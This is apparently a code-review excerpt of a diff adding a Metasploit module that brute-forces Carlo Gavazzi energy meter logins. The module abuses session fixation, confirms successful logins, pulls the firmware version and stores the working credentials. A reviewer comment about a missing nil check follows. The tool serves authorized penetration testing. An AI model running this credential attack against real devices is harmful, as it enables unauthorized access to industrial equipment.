modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb

```diff
@@ -0,0 +1,268 @@
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  #
+  # Brute-force the login page
+  #
+
+  def do_login(user, pass)
+    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+
+    # Set Cookie - Box is vuln to Session Fixation. Generating a random cookie for use.
+    randomvalue = Rex::Text.rand_text_alphanumeric(26)
+    cookie_value = 'PHPSESSID=' + "#{randomvalue}"
+
+    begin
+      res = send_request_cgi(
+        {
+          'uri'       => '/login.php',
+          'method'    => 'POST',
+          'headers'   => {
+            'Cookie' => cookie_value
+          },
+          'vars_post' =>
+            {
+              'username' => user,
+              'password' => pass,
+              'Entra' => 'Sign+In' # Also - 'Entra' => 'Entra' # Seen to vary in some models
+            }
+        }
+      )
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return :abort
+    end
+
+    if (res && ((res.code == 200 && (res.body.include?('Login in progress') || res.body.include?('Login in corso')) && res.body.match(/id="error" value="2"/)) || (res.code == 302 && res.headers['Location'] == 'disclaimer.php')))
+      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+
+      # Extract firmware version
+      begin
+        res = send_request_cgi(
+          {
+            'uri' => '/setupfirmware.php',
+            'method' => 'GET',
+            'headers' => {
+              'Cookie' => cookie_value
+            }
+          }
+        )
+      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+        vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+        return :abort
+      end
+
+      if (res && res.code == 200 && res.body.include?('Firmware Version'))
+        fw_ver_dirty = res.body.match(/Firmware Version(.*)(.*)td/)
+
+        if !fw_ver_dirty.nil?
+          fw_ver_clean = "#{fw_ver_dirty}".match(/Ver. (.*)[$<]/)[1]
+          print_good("#{rhost}:#{rport} - Firmware version #{fw_ver_clean}...")
+
+          report_cred(
+            ip: rhost,
+            port: rport,
+            service_name: "Carlo Gavazzi Energy Meter [Firmware ver #{fw_ver_clean}]",
+            user: user,
+            password: pass
+          )
+        end
+      end
+
+      if (res && res.code == 200 && res.body.include?('Versione Firmware Installata'))
+        fw_ver_dirty = res.body.match(/Ver. (.*)[$<]/)
+
+        if !fw_ver_dirty.nil?
+          fw_ver_clean = "#{fw_ver_dirty}".match(/[^Ver. ](.*)[^<]/)
+          print_good("#{rhost}:#{rport} - Firmware version #{fw_ver_clean}...")
```

Comment:
Just like `fw_ver_dirty`, you assume that regex will hit.  And it looks pretty good, but theres also no telling what future firmwares may bring that may mess it up.  To be safe, this `fw_ver_clean` also needs to be checked for nil.